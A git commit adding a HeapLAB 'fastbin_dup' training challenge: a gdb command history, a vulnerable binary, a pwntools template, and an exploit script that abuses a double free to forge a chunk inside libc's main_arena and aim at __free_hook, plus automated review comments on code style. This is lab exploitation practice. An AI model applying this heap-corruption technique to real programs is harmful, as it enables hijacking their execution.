Diffstat (limited to 'HeapLAB/challenge-fastbin_dup')
-rw-r--r-- | HeapLAB/challenge-fastbin_dup/.gdb_history | 256 | ||||
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/bruh.py | 83 | ||||
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/fastbin_dup_2 | bin | 0 -> 15792 bytes | |||
-rwxr-xr-x | HeapLAB/challenge-fastbin_dup/pwntools_template.py | 60 |
4 files changed, 399 insertions, 0 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
new file mode 100644
index 0000000..b2cbfcb
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -0,0 +1,256 @@ +x &main_arena +x/100x &main_arena +print main_arena +fastbins +q +fastbins +fastbins +c +exit +quit +quit +fastbins +print main_arena +q +print main_arena +q +vis_heap_chunks +print main_arena +db main_arena +db &main_arena +db &main_arena/100 +db &main_arena 100 +db &main_arena 1000 +x main_arena.top +x &main_arena.top +db &main_arena 100 +c +fastbins +print main_arena +x main_arena.fasbinsY +x &main_arena.fastbinsY +quit +fastbins +x 0x7f0946700b70 +db 0x7f0946700b70 100 +q +fastbins +q +fastbins +q +fastbinsx +db &main_arena 100 +q +db 0x7f2e5c845b60 +0x7f2e5c845b70 + 16 +x 0x7f2e5c845b70 + 16 +x 0x7f2e5c845b70 +x 0x7f2e5c845b70 +x 0x7f2e5c845b60 +vis_heap_chunks +db 0x7f0ba6e3db70 +db 0x555bdeaca000 100 +db 0x7f0ba6e3db70 +db 0x7f0ba6e3db70 - 8 +db 0x7f0ba6e3db70-8 +db 0x7f0ba6e3db70-7 +q +x 0x7fcf882cbb69 +db 0x7fcf882cbb69 +q +vis_heap_chunks +print main_arena +q +print main_arena +vis_heap_chunks +q +print main_arena +q +print main_arena +fastbins +r +q +r +c +fastbisn +vis_heap_chunks +fastbins +quit +fastbins +print main_arena +c +print main_arena +q +print main_arena +print main_arena +x malloc_free_hook +x __free_hook +x &__free_hook +x &__free_hook 100 +db &__free_hook 100 +q +q +q +q +print main_arena +db 0x7f4858584e10 +c +print victim +q +fastbins +c +x idx +x chunksize(p) +x chunksize +x p +fastbins +q +x __free_hook +x &__free_hook 100 +db &__free_hook 100 +db &__free_hook - 100 +db &__free_hook-100 +db &__free_hook-100 100 +print main_arena +x 0x7fca0f75fe10 +x/100 0x7fca0f75fe10 +x/100 0x7fca0f75fe10-100 +c +q +break malloc +c +fastbins +x __free_hook +fastins +fastbins +print main_arena +x 0x7f072b59ee10 +break malloc +break free +continue +c +c +c +print main_arena +vis_heap_chunks +vis_heap_chunks +c +vis_heap_chunks +break free +break malloc +c +print main_arena +x &__free_hook - 16 +q +print main_arena +vis_heap_chunks +c +c +c +q +db __malloc_hook +db &__malloc_hook +x __malloc_hook +x &__malloc_hook +c +break sysmalloc 
+c +frame 2 +context +c +break main +c +q +x &__malloc_hook +print __malloc_hook +print &__malloc_hook +print __main_arena +print main_arena +print main_arena +x __malloc_hook +x &__malloc_hook +db &__malloc_hook +db &__malloc_hook-100 100 +db &__malloc_hook-100 100*8 +db &__malloc_hook-100 (100*8)+1 +fastbins +c +print main_arena +x __malloc_hook +x &__malloc_hook +db &__malloc_hook-100 (100*8)+1 +c +db &__malloc_hook-100 (100*8)+1 +print main_arena +x 0x7f5b07a18b40 +break malloc +c +c +c +q +break __libc_malloc +break malloc +break __malloc_hook +b __malloc_hook +b &__malloc_hook +b *__malloc_hook +b *&__malloc_hook +c +delete 3 +c +pwndbg heap +vis_heap_chunks +print __mallinfo +x __mallinfo +print &__mallinfo +print *__mallinfo +print __mallinfo +print &__mallinfo +print main_arena +c +break malloc +c +x main_arena.top_check +x main_arena.top_chunk +print main_arena +x 0x7f4854db6b40 +x 0x7f4854db6b40 +x 0x7f4854db6b40 +c +x 0x7f4854db6b40 +fastbins +c +x 0x7f4854db6b40 +c +x 0x7f4854db6b40 +x main_arena +x &main_arena +x &__malloc_hook +x main_arena.top +db main_arena.top +c +c +c +q +print __malloc_hook +print __malloc_hook +fastbins +c +fastbins +c +vis_heap_chunks +c +fastbins +r +c +fastbins +print main_arena +vis_heap +c +fastbins +fastbins +c +fastbins +r +c + quit diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py new file mode 100755 index 0000000..191cbea --- /dev/null +++ b/HeapLAB/challenge-fastbin_dup/bruh.py 
@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+context.terminal = ['kitty', 'bash', '-c']
+
+gs = '''
+continue
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+#13 chunks
+
+chunk1 = malloc(24, 'abcd')
+chunk2 = malloc(24, 'abcc')
+
+free(chunk1)
+free(chunk2)
+free(chunk1)
+
+#malloc(24, p64(libc.sym.main_arena + 96))
+#this sets up a fake size field in the fastbins
+malloc(24, p64(0x81))
+malloc(24, 'asdf')
+malloc(24, 'asdf')
+
+chunk_b1 = malloc(119, 'asdf')
+chunk_b2 = malloc(119, 'asdf')
+
+free(chunk_b1)
+free(chunk_b2)
+free(chunk_b1)
+
+fake_chunk_loc = libc.sym.main_arena + 8 # begining of fastbin array
+
+malloc(119, p64(fake_chunk_loc))
+malloc(119, 'asdf')
+malloc(119, 'sdfg')
+
+#8 * 9
+
+malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+
+print(hex(fake_chunk_loc))
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
Binary files differ
new file mode 100755
index 0000000..faa0249
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
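Review bot: In `def free(index):` the parameter shadows the module-level `index` counter that `malloc()` updates through `global index`, so the two helpers read as though they share state when only one of them does; `def free(idx):` with `io.sendafter("index: ", f"{idx}")` removes the ambiguity. The same helper pair appears unchanged in pwntools_template.py. The helpers also keep the tube in text mode — `io.send("1")`, `io.sendafter("size: ", f"{size}")`, `io.recvuntil("> ")` — while the later calls pass `p64(...)` bytes as `data`; pwntools accepts `str` here but warns that it is assuming ASCII, so `b"..."` literals and `str(size).encode()` throughout keep the I/O consistently bytes. Comments such as `#13 chunks` and `#8 * 9` record a number rather than what it refers to; a short sentence on what each count is (which allocations, which fields) would make the script readable without the accompanying debugger session.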
diff --git a/HeapLAB/challenge-fastbin_dup/pwntools_template.py b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..1faaaf8
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+#gs = '''
+#continue
+#'''
+gs = '''
+break main
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request two 0x50-sized chunks.
+chunk_A = malloc(0x48, "A"*8)
+chunk_B = malloc(0x48, "B"*8)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
+
+# =============================================================================
+
+io.interactive() |
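Review bot: The commented-out block `#gs = '''` / `#continue` / `#'''` above the live `gs = '''` is dead code left over from switching the gdbscript to `break main`; delete it rather than keep both variants side by side, or keep a single `gs` and change its contents. The comment `# Index of allocated chunks.` on `index = 0` understates what the variable holds: `malloc()` does `index += 1` and then `return index - 1`, so it is the index the next allocation will be given, and `# Index the next malloc() call will hand out; bumped on every allocation.` describes it more precisely.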